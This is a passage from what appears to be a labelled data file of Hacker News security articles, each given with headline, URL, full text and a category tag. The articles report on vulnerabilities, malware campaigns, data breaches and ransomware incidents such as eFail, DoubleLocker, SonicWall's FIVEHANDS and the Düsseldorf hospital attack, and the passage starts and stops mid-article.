now, the issue appears to be a remote code execution vulnerability in Signal or at least something very close to persistent cross-site scripting (XSS) which eventually could allow attackers to inject malicious code onto targeted Windows and Linux systems. ""For the time being, we can only confirm the execution of javascript code. However we are tracking a heap corruption issue, and it's very likely than the javascript execution could lead to native code execution with additional research."" Ortega told The Hacker News. Ortega also confirms us that the exploitation of this issue requires chaining a couple of vulnerabilities found by two other security researchers from Argentina, Ivan and Juliano. ""I can confirm that this bug did not exist before and was last introduced because the devs forgot why there was a regex there to begin with. I would like to recommend a comment to this comment if it is not repeated again (TBD),"" Ivan said. At this moment, it is not clear if the primary vulnerability or other chained bugs reside only in the source code of Signal or also in the popular Electron web application framework, the technology on which Signal desktop applications are based. If the flaw resides in the Electron framework, it might also impact other widely-used desktop applications as well, including Skype, Wordpress, and Slack, which also use the same framework. Moreover, the infosec community is also worried that if this flaw allows remote attackers to steal their secret encryption keys, it would be the worst nightmare for Signal users. The good news is that the Open Whisper Systems has already addressed the issue and immediately released new versions of Signal app within a few hours after receiving the responsible vulnerability disclosure by the researcher. The primary vulnerability that triggers the code execution has been patched in Signal stable release version 1.10.1 and pre-release version 1.11.0-beta.3. So, users are advised to update their Signal for desktop applications as soon as possible. ""At this time we are not sure they all [the vulnerabilities chained together] have been fixed"" Ortega told The Hacker News. The latest release also patched a recently disclosed vulnerability in Signal for desktop apps which was exposing disappearing messages in a user-readable database of macOS's Notification Center, even if they are deleted from the app. We will update this article as soon as we get more details of the vulnerability from the researcher. Till then, stay tuned to Facebook and Twitter accounts. ",Cyber_Attack Google Chrome vulnerability allows Websites to Eavesdrop on You,https://thehackernews.com/2014/04/google-chrome-vulnerability-allows.html,"Just imagine, you are sitting in front of your laptop and your laptop is listening to your nearby conversations. What if the recorded audio from the system's microphone is being instantly uploaded to a malicious website? Google has created a speech-recognition Application Programming Interface (API) that allows websites to interact with Google Chrome and the computer's microphone allows you to speak instead of typing into any text box, to make hands-free web searches, quick conversions, and audio translator also work with them. In January, a flaw was discovered in Google Chrome that enabled malicious websites with speech recognition software to eavesdrop on users' conversations from background without their knowledge using an outdated Google speech API. CHROME IS LISTENING YOU A new similar vulnerability in Google Chrome has been discovered by Israeli security researcher, Guy Aharonovsky, claimed that the Chrome's speech-recognition API has a vulnerability that allows attackers to turn victim's machine into a listening port without asking for any permission, even if your microphone is completely disabled. ""Even blocking any access to the microphone under chrome://settings/content will not remedy this flaw."" he said in a blog post. Reported vulnerability exploits the ""-x-webkit-speech"" feature of Chrome's speech-recognition API and allows a malicious web application to eavesdrop in the background without any indication to the user that their microphone is enabled. He has also published a Proof-of-Concept webpage and a video demonstration, designed to work on Chrome for Mac operating system, but the exploit only works for Chrome for any operating system. In demonstration, he has used HTML5 full screen feature to the indication box. ""In Chrome all one need in order to access the user's speech is to use this line of HTML5 code: that's all; there will be no fancy confirmation screens. When the user clicks on that little grey microphone he will be recorded. The user will see the 'indication box' telling him to ""Speak now"" but that can be pushed out of the screen and / or obfuscated."" He has reported the flaw to Google via Chromium bug tracker. They confirmed the existence of the vulnerability, but assigned it 'low' severity level, that means Google will not offer any immediate fix for this flaw. ",Vulnerability Nasty Android Malware that Infected Millions Returns to Google Play Store,https://thehackernews.com/2017/01/hummingbad-android-malware.html,"HummingBad – an Android-based malware that infected over 10 million Android devices around the world last year and made its gang an estimated US$300,000 per month at its peak – has made a comeback. Security researchers have discovered a new variant of the HummingBad malware hiding in more than 20 Android apps on Google Play Store. The infected apps were already downloaded by over 12 Million unsuspecting users before the Google Security team removed them from the Play Store. Dubbed HummingWhale by researchers at security firm Check Point, the new malware utilizes new, cutting-edge techniques that allow the nasty software to conduct Ad fraud better than ever before and generate revenue for its developers. The Check Point researchers said the HummingWhale-infected apps had been published under the name of fake Chinese developers on the Play Store with common name structure, com.[name].camera, but with suspicious startup behaviors. ""It registered several events on boot, such as TIME_TICK, SCREEN_OFF and INSTALL_REFERRER which [were] dubious in that context,"" Check Point researchers said in a blog post published Monday. HummingWhale Runs Malicious Apps in a Virtual Machine The HummingWhale malware is tricky than HummingBad, as it uses a disguised Android application package (APK) file that acts as a dropper which downloads and runs further apps on the victim's smartphone. If the victim notices and closes its process, the APK file then drops itself into a virtual machine in an effort to make it harder to detect. The dropper makes use of an Android plugin created by the popular Chinese security vendor Qihoo 360 to upload malicious apps to the virtual machine, allowing HummingWhale to further install other apps without having to elevate permissions, and disguises its malicious activity to get onto Google Play. ""This .apk operates as a dropper, used to download and execute additional apps, similar to the tactics employed by previous versions of HummingBad,"" researchers said. ""However, this dropper went much further. It uses an Android plugin called DroidPlugin, originally developed by Qihoo 360, to upload fraudulent apps on a virtual machine."" HummingWhale Runs Without having to Root the Android Device Thanks to the virtual machine (VM), the HummingWhale malware no longer needs to root Android devices unlike HummingBad and can install any number of malicious or fraudulent apps on the victim's devices without overloading their smartphones. Once the victim gets infected, the command and control (C&C) server send fake ads and malicious apps to the user, which runs in a VM, generating a fake referrer ID used to spoof unique users for ad fraud purposes and generate revenue. Alike the original HummingBad, the purpose of HummingWhale is to make lots of money through ad fraud and fake app installations. Besides all these malicious capabilities, the HummingWhale malware also tries to raise its reputation on Google Play Store using fraudulent ratings and comments, the tactic similar to the one utilized by the Gooligan malware. ",Malware Slack Resets Passwords For Users Who Hadn't Changed It Since 2015 Breach,https://thehackernews.com/2019/07/slack-password-data-breach.html,"If you use Slack, a popular cloud-based team collaboration server, and recently received an email from the company about a security incident, don't panic and read this article before taking any action. Slack has been sending a ""password reset"" notification email to all those users who had not yet changed passwords for their Slack accounts since 2015 when the company suffered a massive data breach. For those unaware, in 2015, hackers unauthorisedly gained access to one of the company's databases that stored user profile information, including their usernames, email addresses, and hashed passwords. At that time, attackers also secretly inserted code, probably on the login page, which allowed them to capture plaintext passwords entered by some Slack users during that time. However, immediately following the security incident, the company automatically reset passwords for those small number of Slack users whose plaintext passwords were exposed, but asked other affected users to change their passwords manually. Keep calm and change your password 😊 Slack is resetting the passwords for all those users (approximately 1% of total) who hadn't changed their passwords since 2015 when the company experienced a #databreach leaking users' credentialshttps://t.co/k6jSBgloAX Check this thread: https://t.co/Fo7QbI9pOv — The Hacker News (@TheHackersNews) July 18, 2019 Now in its latest statement released today, the company said they learned about a new list of username and password combinations that match with the login credentials of its users who did not change their password after the 2015 data breach. ""We were recently contacted through our bug bounty program with information about potentially compromised Slack credentials,"" Slack states. ""We immediately confirmed that a portion of the email addresses and password combinations were valid, reset those passwords, and explained our actions to the affected users."" The latest security incident only affects users, who: created an account before March 2015, have not changed their password since the incident, and accounts that do not require logging in via a single-sign-on (SSO) provider. The company is not exactly aware of the source of this new leaked plaintext credentials, but suggests it could be the ""result of malware attack or password reuse between services."" It is also possible that someone might have successfully cracked hashed passwords that were leaked in the 2015 data breach, even when it was protected using the bcrypt algorithm with a randomly generated salt per-password. Late last month, Slack also sent a separate notification to all the affected users informing them about the potential compromise of their credentials without providing any details of the incident, but it seems many users ignored the warning and did not change their passwords voluntarily. Therefore, now Slack has automatically reset passwords on affected accounts, that are about 1% of the total registered users, that haven't been updated since 2015 as a precautionary measure, asking them to set a new password using this guide. ""We have no reason to believe that any of these accounts were compromised, but we believe that this precaution is worth any inconvenience the reset may cause,"" the company said. Besides your changing password, you are also recommended to enable two-factor authentication for your Slack accounts, even if you are not affected. Slack is still investigating the latest security incident and promises to share more information as soon as they are available. ",Cyber_Attack Thousands of WordPress Sites Hacked Using Recently Disclosed Vulnerability,https://thehackernews.com/2017/02/wordpress-hack-seo.html,"Last week, we reported about a critical zero-day flaw in WordPress that was silently patched by the company before hackers have had their hands on the nasty bug to exploit millions of WordPress websites. To ensure the security of millions of websites and its users, WordPress delayed the vulnerability disclosure for over a week and worked closely with security companies and hosts to install the patch, ensuring that the issue was dealt with in short order before it became public. But even after the company's effort to protect its customers, thousands of admins did not bother to update their websites, which are still vulnerable to the critical bug and has already been exploited by hackers. While WordPress includes a default feature that automatically updates unpatched websites, some admins running critical services disable this feature for first testing and then applying patches. Even the news blog of one of the famous Linux distribution OpenSUSE (news.opensuse.org) was also hacked, but restored immediately without breach of any other part of openSUSE's infrastructure, CIO reports. The vulnerability resided in Wordpress REST API that would lead to the creation of new flaws, allowing an unauthenticated attacker to delete pages or modify all pages on unpatched websites and redirect their visitors to malicious exploits and a large number of attacks. The security researcher at Sucuri, who privately disclosed the flaw to WordPress, said they started noticing the attacks leveraging this bug less than 48 hours after disclosure. They noticed at least four different campaigns targeting still unpatched websites. In one such campaign, hackers were successful in replacing the content of over 66,000 web pages with ""Hacked by"" messages. Rest campaigns have targeted roughly 1000 pages in total. Besides defacing websites, such attacks appear to be carried out mostly for black hat SEO campaign in order to spread spam and gain ranking in search engine, which is also known as search engine poisoning. ""What we expect to see is a lot more SEO spam (Search Engine Poisoning) attempts moving forward,"" explained Daniel Cid, CTO, and founder of Sucuri. ""There's already a few exploit attempts that try to add spam images and content to a post. Due to the monetization possibilities, this will likely be the #1 route to abuse this vulnerability."" So, site administrators who have not yet updated their websites to the latest WordPress release 4.7.2 are urged to patch them immediately before becoming next target of SEO spammers and hackers. ",Cyber_Attack Experts Unveil Cyber Espionage Attacks by CopyKittens Hackers,https://thehackernews.com/2017/07/opykittens-cyber-espionage.html,"Security researchers have discovered a new, massive cyber espionage campaign that mainly targets people working in government, defence and academic organisations in various countries. The campaign is being conducted by an Iran-linked threat group, whose activities, attack methods, and targets have been released in a joint, detailed report published by researchers at Trend Micro and Israeli firm ClearSky. Dubbed by researchers CopyKittens (aka Rocket Kittens), the cyber espionage group has been active since at least 2013 and has targeted organisations and individuals, including diplomats and researchers, in Israel, Saudi Arabia, Turkey, the United States, Jordan and Germany. The targeted organisations include government institutions like Ministry of Foreign Affairs, defence companies, large IT companies, academic institutions, subcontractors of the Ministry of Defense, and municipal authorities, along with employees of the United Nations. The latest report [PDF], dubbed ""Operation Wilted Tulip,"" details an active espionage campaign conducted by the CopyKittens hackers, a vast range of tools and tactics they used, its command and control infrastructure, and the group's modus operandi. How CopyKittens Infects Its Targets The group used different tactics to infiltrate their targets, which includes watering hole attacks — wherein JavaScript code is inserted into compromised websites to distribute malicious exploits. The news media and organisations whose websites were abused as watering hole attacks include The Jerusalem Post, for which even German Federal Office for Information Security (BSI) issued an alert, Maariv news and IDF Disabled Veterans Organization. Besides water hole attacks, CopyKittens also used other methods to deliver malware, including: Emailed links to malicious websites controlled by attackers. Weaponized Office documents exploiting recently discovered flaw (CVE-2017-0199). Web servers exploitation using vulnerability scanner and SQLi tools like Havij, sqlmap, and Acunetix. Fake social media entities to build trust with targets and potentially spread malicious links. ""The group uses a combination of these methods to persistently target the same victim over multiple platforms until they succeed in establishing an initial beachhead of infection – before pivoting to higher value targets on the network,"" Trend Micro writes in a blog post. In order to infect its targets, CopyKittens makes use of its own custom malware tools in combination with existing, commercial tools, like Red Team software Cobalt Strike, Metasploit, post-exploitation agent Empire, TDTESS backdoor, and credential dumping tool Mimikatz. Dubbed Matryoshka, the remote access trojan is the group's self-developed malware which uses DNS for command and control (C&C) communication and has the ability to steal passwords, capture screenshots, record keystrokes, collect and upload files, and give the attackers Meterpreter shell access. ""Matryoshka is spread through spear phishing with a document attached to it. The document has either a malicious macro that the victim is asked to enable or an embedded executable the victim is asked to open,"" Clear Sky says in a blog post. The initial version of the malware was analysed in 2015 and seen in the wild from July 2016 until January 2017, though the group also developed and used Matryoshka version 2. Users are recommended to enable two-factor authentication in order to protect their webmail accounts from being compromised, which is a treasure trove of information for hackers, and an ""extremely strong initial beachhead"" for pivoting into other targets. ",Cyber_Attack "Millions of DSL modems hacked in Brazil, spread banking malware",https://thehackernews.com/2012/10/millions-of-dsl-modems-hacked-in-brazil.html,"More than 4.5 million DSL modems have been compromised as part of a sustained hacking campaign in Brazil, with the devices spreading malware and malicious web address redirects. According to the malware analyst at Kaspersky Lab in Brazil, Fabio Assolini. The vulnerability exploited by attackers allowed the use of a script to steal passwords and remotely access the configuration of modems. The attacks was described as ""One firmware vulnerability, two malicious scripts, three hardware manufacturers, 35 malicious DNS servers, thousands of compromised ADSL modems, millions of victims."" According to Kaspersky, the Brazilian attackers sought to steal users' banking credentials by redirecting users to false versions of popular sites like Facebook or Google and prompting them to install malware. Some 40 DNS servers were set up outside Brazil too in order to serve forged requests for domain names belonging to Brazilian banks. Nakedsecurity writes,-- The first thing users may have noticed is that they would visit legitimate websites such as Google, Facebook and Orkut (a Google social network which is particularly popular in Brazil) and would be prompted to install software. In the example below, visitors to Google.com.br were invited to install a program called ""Google Defence"" in order to access the ""new Google"". It remains unclear which modem manufacturers and models are susceptible to the attacks. Assolini said a vulnerability disclosed in early 2011 appears to be caused by a chipset driver included with modems that use hardware from communications chip provider Broadcom. It allows a CSRF attack to take control of the administration panel and capture the password set on vulnerable devices. After manufacturers issued firmware updates to plug the security hole, the number of compromised modems reduced. However, some 300,000 modems are still thought to be controlled by attackers. ",Malware Yahoo Mail hacked; Change your account password immediately,https://thehackernews.com/2014/01/yahoo-mail-hacked-change-your-account.html,"A really bad year for the world's second-largest email service provider, Yahoo Mail! The company announced today, 'we identified a coordinated effort to gain unauthorized access to Yahoo Mail accounts', user names and passwords of its email customers have been stolen and are used to access multiple accounts. Yahoo did not say how many accounts have been affected, and neither they are sure about the source of the leaked users' credentials. It appears to have come from a third party database being compromised, and not an infiltration of Yahoo's own servers. ""We have no evidence that they were obtained directly from Yahoo's systems. Our ongoing investigation shows that malicious computer software used the list of usernames and passwords to access Yahoo Mail accounts. The information sought in the attack seems to be names and email addresses from the affected accounts' most recent sent emails."" For now, Yahoo is taking proactive actions to protect their affected users, ""We are resetting passwords on impacted accounts and we are using second sign-in verification to allow users to re-secure their accounts. Impacted users will be prompted (if not, already) to change their password and may receive an email notification or an SMS text if they have added a mobile number to their account."" People frequently use the same passwords on multiple accounts, so possibly hackers are brute-forcing Yahoo accounts with the user credentials stolen from other data breaches. Yahoo users can prevent account hijacks by using a strong and unique password. You can use 'Random strong password generator' feature of DuckDuckGo search engine to get a unique & strong password. Users are also recommended to enable two-factor authentication, which requires a code texted to the legitimate user's mobile phone whenever a login attempt is made from a new computer. Yahoo! was hacked in July 2012, with attackers stealing 450,000 email addresses and passwords from a Yahoo! contributor network. Readers can also download two free Whitepaper related to the Email and account security: Cloud-Based Email Archiving Email Data Loss Prevention Well, Yahoo is now working with federal law enforcement as a part of its investigation. ",Data_Breaches Cyber jihadists could use Stuxnet worm to attack the west !,https://thehackernews.com/2011/04/cyber-jihadists-could-use-stuxnet-worm.html,"Cyber jihadists could use Stuxnet worm to attack the west ! ACCORDING TO Mikko Hypponen, F-Secure's chief security researcher, there has been a revolution in malware with Stuxnet. ""The worst case scenario is that Al-Qaeda or another organisation could gain access to this type of knowledge and information, and make use of it to launch attacks on critical infrastructure – like blow up nuclear power plants or do something to our food chain."" ",Malware New Ransomware Not Just Encrypts Your Android But Also Changes PIN Lock,https://thehackernews.com/2017/10/android-ransomware-pin.html,"DoubleLocker—as the name suggests, it locks device twice. Security researchers from Slovakia-based security software maker ESET have discovered a new Android ransomware that not just encrypts users' data, but also locks them out of their devices by changing lock screen PIN. On top of that: DoubleLocker is the first-ever ransomware to misuse Android accessibility—a feature that provides users alternative ways to interact with their smartphone devices, and mainly misused by Android banking Trojans to steal banking credentials. ""Given its banking malware roots, DoubleLocker may well be turned into what could be called ransom-bankers,"" said Lukáš Štefanko, the malware researcher at ESET. ""Two-stage malware that first tries to wipe your bank or PayPal account and subsequently locks your device and data to request a ransom."" Researchers believe DoubleLocker ransomware could be upgraded in future to steal banking credentials as well, other than just extorting money as ransom. First spotted in May this year, DoubleLocker Android ransomware is spreading as a fake Adobe Flash update via compromised websites. Here's How the DoubleLocker Ransomware Works: Once installed, the malware requests user for the activation of 'Google Play Services' accessibility feature, as shown in the demonstration video. After obtaining this accessibility permission, the malware abuses it to gain device's administrator rights and sets itself as a default home application (the launcher)—all without the user's knowledge. ""Setting itself as a default home app – a launcher – is a trick that improves the malware's persistence,"" explains Štefanko. ""Whenever the user clicks on the home button, the ransomware gets activated, and the device gets locked again. Thanks to using the accessibility service, the user does not know that they launch malware by hitting Home."" Once executed, DoubleLocker first changes the device PIN to a random value that neither attacker knows nor stored anywhere and meanwhile the malware encrypts all the files using AES encryption algorithm. DoubleLocker ransomware demands 0.0130 BTC (approximately USD 74.38 at time of writing) and threatens victims to pay the ransom within 24 hours. If the ransom is paid, the attacker provides the decryption key to unlock the files and remotely resets the PIN to unlock the victim's device. How to Protect Yourself From DoubleLocker Ransomware According to the researchers, so far there is no way to unlock encrypted files, though, for non-rooted devices, users can factory-reset their phone to unlock the phone and get rid of the DoubleLocker ransomware. However, for rooted Android devices with debugging mode enabled, victims can use Android Debug Bridge (ADB) tool to reset PIN without formatting their phones. The best way to protect yourself from avoiding falling victims to such ransomware attacks is to always download apps from trusted sources, like Google play Store, and stick to verified developers. Also, never click on links provided in SMS or emails. Even if the email looks legit, go directly to the website of origin and verify any possible updates. Moreover, most importantly, keep a good antivirus app on your smartphone that can detect and block such malware before it can infect your device, and always keep it and other apps up-to-date. ",Malware Former NSA software developer can Hack Surveillance cameras remotely,https://thehackernews.com/2013/06/former-nsa-software-developer-can-hack.html,"A former NSA software developer is saying he has identified how major camera systems used by industrial plants, prisons, banks and the military could be hacked to freeze a frame and would allow hackers to spy on facilities or gain access to sensitive computer networks. Craig Heffner, that there were zero day vulnerabilities in digital video surveillance equipment from firms, including Cisco Systems, D-Link and TRENDnet. He has discovered hundreds of thousands of surveillance cameras that can be accessed via the public Internet. ""Somebody could potentially access a camera and view it. Or they could also use it as a pivot point, an initial foothold, to get into the network and start attacking internal systems."" Heffner said. Wrost thing, probably NSA is also aware of these vulnerabilities. They could use it as a pivot point, an initial foothold, to get into the network and start attacking internal systems. He said he doesn't plan on revealing the vulnerabilities to the companies ahead of the conference, but all the companies have expressed that they'll stay tuned to make any necessary fixes. He plans to demonstrate techniques for exploiting these bugs at the Hacking conference, in July. He can freeze a picture on a surveillance camera to help thieves break into facilities without detection. ",Vulnerability Hackers Exploit SonicWall Zero-Day Bug in FiveHands Ransomware Attacks,https://thehackernews.com/2021/04/hackers-exploit-sonicwall-zero-day-bug.html,"An ""aggressive"" financially motivated threat group tapped into a zero-day flaw in SonicWall VPN appliances prior to it being patched by the company to deploy a new strain of ransomware called FIVEHANDS. The group, tracked by cybersecurity firm Mandiant as UNC2447, took advantage of an ""improper SQL command neutralization"" flaw in the SSL-VPN SMA100 product (CVE-2021-20016, CVSS score 9.8) that allows an unauthenticated attacker to achieve remote code execution. ""UNC2447 monetizes intrusions by extorting their victims first with FIVEHANDS ransomware followed by aggressively applying pressure through threats of media attention and offering victim data for sale on hacker forums,"" Mandiant researchers said. ""UNC2447 has been observed targeting organizations in Europe and North America and has consistently displayed advanced capabilities to evade detection and minimize post-intrusion forensics."" CVE-2021-20016 is the same zero-day that the San Jose-based firm said was exploited by ""sophisticated threat actors"" to stage a ""coordinated attack on its internal systems"" earlier this year. On January 22, The Hacker News exclusively revealed that SonicWall had been breached by exploiting ""probable zero-day vulnerabilities"" in its SMA 100 series remote access devices. Successful exploitation of the flaw would grant an attacker the ability to access login credentials as well as session information that could then be used to log into a vulnerable unpatched SMA 100 series appliance. According to the FireEye-owned subsidiary, the intrusions are said to have occurred in January and February 2021, with the threat actor using a malware called SombRAT to deploy the FIVEHANDS ransomware. It's worth noting that SombRAT was discovered in November 2020 by BlackBerry researchers in conjunction with a campaign called CostaRicto undertaken by a mercenary hacker group. UNC2447 attacks involving ransomware infections were first observed in the wild in October 2020, initially compromising targets with HelloKitty ransomware, before swapping it for FIVEHANDS in January 2021. Incidentally, both the ransomware strains, written in C++, are rewrites of another ransomware called DeathRansom. ""Based on technical and temporal observations of HelloKitty and FIVEHANDS deployments, HelloKitty may have been used by an overall affiliate program from May 2020 through December 2020, and FIVEHANDS since approximately January 2021,"" the researchers said. FIVEHANDS also differs from DeathRansom and HelloKitty in the use of a memory-only dropper and additional features that allow it to accept command-line arguments and utilize Windows Restart Manager to close a file currently in use prior to encryption. The disclosure comes less than two weeks after FireEye divulged three previously unknown vulnerabilities in SonicWall's email security software that were actively exploited to deploy a web shell for backdoor access to the victim. FireEye is tracking this malicious activity under the moniker UNC2682. ",Malware Here's How eFail Attack Works Against PGP and S/MIME Encrypted Emails,https://thehackernews.com/2018/05/efail-pgp-email-encryption.html,"With a heavy heart, security researchers have early released the details of a set of vulnerabilities discovered in email clients for two widely used email encryption standards—PGP and S/MIME—after someone leaked their paper on the Internet, which was actually scheduled for tomorrow. PGP and S/MIME are popular end-to-end encryption standards used to encrypt emails in a way that no one, not even the company, government, or cyber criminals, can spy on your communication. Before explaining how the vulnerability works, it should be noted that the flaw doesn't reside in the email encryption standards itself; instead, it affects a few email clients/plugins that incorrectly implemented the technologies. Dubbed eFail by the researchers, the vulnerabilities, as described in our previous early-warning article, could allow potential attackers to decrypt the content of your end-to-end encrypted emails in plaintext, even for messages sent in the past. According to the paper released by a team of European security researchers, the vulnerabilities exist in the way encrypted email clients handle HTML emails and external resources, like loading of images, styles from external URLs. Here's How the eFail Attack Works: Email clients are usually configured to automatically decrypt the content of encrypted emails you receive, but if your client is also configured to load external resources automatically, attackers can abuse this behavior to steal messages in plaintext just by sending you a modified version of the same encrypted email content. The attack vector requires injected plaintext into the encrypted mail, and then using the exploit, it will exfiltrate the originally encrypted data as soon as any recipient's mail client accesses (or decrypts) the message It should be noted that to perform an eFail attack, an attacker must have access to your encrypted emails, which is then modified in the following way and send back to you in order to trick your email client into revealing the secret message to the remote attacker without alerting you. As described in the proof-of-concept attack released by the researchers, the attacker uses one of the encrypted messages you are supposed to receive or might have already received and then turns it into a multipart HTML email message, as well as forges the return address, so it appears to come from the original sender. In the newly composed email, the attacker adds an unclosed image tag, like this , as clearly shown in the screenshot. When your vulnerable email client receives this message, it decrypts the encrypted part of the message given in the middle, and then automatically tries to render the HTML content, i.e., the image tag with all the decrypted text as the new name of the image, as shown below. Since your email client will try to load the image from the attacker-controlled server, the attacker can capture this incoming request, where the filename contains the full content of the original encrypted email in plaintext. Although PGP has been designed to show you a warning note if the integrity of your email is compromised, a few email clients do not display these warnings, allowing any potential attackers to perform eFail attacks successfully. How To Prevent Against eFail Attacks Generally, it is a very tough job for an advisory to even intercept your encrypted emails, but for people desperately using email encryption always attract well-resourced and sophisticated attackers. Ditching the use of PGP or S/MIME to prevent eFail attacks would be stupid advice, as it is quite easy to mitigate the reported issues. Users can switch to a good email client that always shows a warning when the integrity of the emails is compromised and doesn't render HTML emails by default to prevent loading of external resources automatically. Researchers also advise users to adopt an authenticated encryption algorithm for sensitive communication. The research was conducted by a team of researchers, including Damian Poddebniak, Christian Dresen, Fabian Ising, and Sebastian Schinzel from Munster University of Applied Sciences; Jens Müller, Juraj Somorovsky, and Jörg Schwenk from Ruhr University Bochum; and Simon Friedberger from KU Leuven. For more in-depth details on the attack technique, you can head on to this informational page about the eFail attack and the paper [PDF] titled, ""Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels,"" published by the researchers. ",Cyber_Attack Critical Flaws Found in Solar Panels Could Shut Down Power Grids,https://thehackernews.com/2017/08/solar-panel-power-grid.html,"A Dutch security researcher has uncovered a slew of security vulnerabilities in an essential component of solar panels which could be exploited to cause widespread outages in European power grids. Willem Westerhof, a cybersecurity researcher at Dutch security firm ITsec, discovered 21 security vulnerabilities in the Internet-connected inverters – an essential component of solar panel that turns direct current (DC) into alternating current (AC). According to Westerhof, the vulnerabilities leave thousands of Internet-connected power inverters installed across Europe vulnerable. Westerhof demonstrates that it is possible for hackers to gain control of a large number of inverters and switch them OFF simultaneously, causing an imbalance in the power grid that could result in power outages in different parts of Europe. The vulnerabilities affect solar panel electricity systems, also known as photovoltaics (PV), made by German solar equipment company SMA, which if exploited in mass, could result in electrical grids getting knocked offline. Westerhof's research, called the ""Horus Scenario"" – named after the Egyptian god of the sky, was first published in a Dutch newspaper Volkskrant, and now he launched a website detailing the vulnerabilities and how a digital attack could lead to terrible consequences. According to the researcher, the attack causes due to an imbalance in the power grid. Since the power grid needs to maintain a constant balance between the supply of power and demand of power, an exceed in supply or demand could cause outages. So, if an attacker manipulates the amount of PV power in a power grid at a particular time, an attacker could cause peaks or dips of several GigaWatts, causing a massive imbalance which may lead to large scale power outages. For a country like Germany, where solar energy covers up to 50 percent of its power demand, such a devastating attack would instantly cause a significant power outage, which would adversely affect millions of people and cost governments billions of dollars. To explain this scenario in real life, Westerhof analysed the PV inverters made by SMA and discovered 17 vulnerabilities, 14 of which received CVE IDs and CVSS scores ranging from 3 (Informational) to 9 (Critical). ""In the worst case scenario, an attacker compromises enough devices and shuts down all these devices at the same time causing threshold values to be hit"" and ""a 3 hour power outage across Europe, somewhere mid day on June is estimated to cause +/- 4.5 billion euros of damage,"" Westerhof writes. Westerhof reported all the vulnerabilities to SMA in late 2016 and worked with the company, power grid regulators, and government officials to fix the issues and harden up the security of their systems. More than six months later, the company patched the flaws in its kit and is rolling out patches to its customers, while power grid regulators and the government will discuss the findings at international conferences. Luckily it was a white hat who discovered the flaws in the solar panel which could have caused a devastating effect on the entire nation. If it were a black hat, it could have resulted in massive power outages across Europe similar to the one suffered by Ukraine last year. ",Vulnerability Cisco Issues Warning Over IOS XR Zero-Day Flaw Being Targeted in the Wild,https://thehackernews.com/2020/09/cisco-issue-warning-over-ios-xr-zero.html,"Cisco has warned of an active zero-day vulnerability in its router software that's being exploited in the wild and could allow a remote, authenticated attacker to carry out memory exhaustion attacks on an affected device. ""An attacker could exploit these vulnerabilities by sending crafted IGMP traffic to an affected device,"" Cisco said in an advisory posted over the weekend. ""A successful exploit could allow the attacker to cause memory exhaustion, resulting in instability of other processes. These processes may include, but are not limited to, interior and exterior routing protocols."" Although the company said it will release software fixes to address the flaw, it did not share a timeline for when it plans to make it available. The networking equipment maker said it became aware of attempts to exploit the flaw on August 28. Tracked as CVE-2020-3566, the severity of the vulnerability has been rated ""high"" with a Common Vulnerability Scoring System score of 8.6 out of a maximum 10. The bug affects all Cisco gear running its Internetwork Operating System (IOS) XR Software and stems from an issue in the Distance Vector Multicast Routing Protocol (DVMRP) feature that makes it possible for an adversary to send specially crafted Internet Group Management Protocol (IGMP) packets to the susceptible device in question and exhaust process memory. IGMP is typically used to efficiently use resources for multicasting applications when supporting streaming content such as online video streaming and gaming. The flaw lies in the manner IOS XR Software queues these packets, potentially causing memory exhaustion and disruption of other processes. While there are no workarounds to resolve the issue, Cisco recommends administrators to run the ""show igmp interface"" command to determine if multicast routing is enabled. ""If the output of 'show igmp interface' is empty, multicast routing is not enabled and the device is not affected by these vulnerabilities,"" the company said. Additionally, admins can also check the system logs for signs of memory exhaustion and implement rate-limiting to reduce IGMP traffic rates to mitigate the risk. Cisco didn't elaborate on how the attackers were exploiting this vulnerability and with what goal in mind. But given that resource exhaustion attacks are also a form of denial-of-service attacks, it wouldn't be surprising if bad actors are leveraging the flaw to interfere with the regular functioning of the system. ",Vulnerability Adwind RAT Returns! Cross-Platform Malware Targeting Aerospace Industries,https://thehackernews.com/2017/07/adwind-rat-malware.html,"Hackers and cyber criminals are becoming dramatically more adept, innovative, and stealthy with each passing day. While other operating systems are more widely in use, cybercriminals have now shifted from traditional activities to more clandestine techniques that come with limitless attack vectors, support for cross platforms and low detection rates. Security researchers have discovered that infamous Adwind, a popular cross-platform Remote Access Trojan written in Java, has re-emerged and currently being used to ""target enterprises in the aerospace industry, with Switzerland, Austria, Ukraine, and the US the most affected countries."" Adwind — also known as AlienSpy, Frutas, jFrutas, Unrecom, Sockrat, JSocket, and jRat — has been in development since 2013 and is capable of infecting all the major operating systems, including Windows, Mac, Linux, and Android. Adwind has several malicious capabilities including stealing credentials, keylogging, taking pictures or screenshots, data gathering and exfiltrate data. The trojan can even turn infected machines into botnets to abuse them for destructing online services by carrying out DDoS attacks. Researchers from Trend Micro recently noticed a sudden rise in the number of Adwind infections during June 2017 — at least 117,649 instances in the wild, which is 107 percent more than the previous month. According to a blog post published today, the malicious campaign was noticed on two different occasions. First was observed on June 7 and used a link to divert victims to their .NET-written malware equipped with spyware capabilities, while the second wave was noticed on June 14 and used different domains hosting their malware and command-and-control servers. Both waves eventually employed a similar social engineering tactic to trick victims into clicking the malicious links within a spam email that impersonate the chair of the Mediterranean Yacht Broker Association (MYBA) Charter Committee. Once infected, the malware also collects system's fingerprints, along with the list of installed antivirus and firewall applications. ""It can also perform reflection, a dynamic code generation in Java. The latter is a particularly useful feature in Java that enables developers/programmers to dynamically inspect, call, and instantiate attributes and classes at runtime. In cybercriminal hands, it can be abused to evade static analysis from traditional antivirus (AV) solutions,"" the researchers wrote. My advice for users to remain protected from such malware is always to be suspicious of uninvited documents sent over an email and never click on links inside those documents unless verifying the source. Additionally, keep your systems and antivirus products up-to-date in order to protect against any latest threat. ",Malware A Patient Dies After Ransomware Attack Paralyzes German Hospital Systems,https://thehackernews.com/2020/09/a-patient-dies-after-ransomware-attack.html,"German authorities last week disclosed that a ransomware attack on the University Hospital of Düsseldorf (UKD) caused a failure of IT systems, resulting in the death of a woman who had to be sent to another hospital that was 20 miles away. The incident marks the first recorded casualty as a consequence of cyberattacks on critical healthcare facilities, which has ramped up in recent months. The attack, which exploited a Citrix ADC CVE-2019-19781 vulnerability to cripple the hospital systems on September 10, is said to have been ""misdirected"" in that it was originally intended for Heinrich Heine University, according to an extortion note left by the perpetrators. After law enforcement contacted the threat actors and informed them that they had encrypted a hospital, the operators behind the attack withdrew the ransom demand and provided the decryption key. The case is currently being treated as a homicide, BBC News reported over the weekend. Unpatched Vulnerabilities Become Gateway to Ransomware Attacks Although several ransomware gangs said early on in the pandemic that they would not deliberately target hospitals or medical facilities, the recurring attacks prompted the Interpol to issue a warning cautioning hospitals against 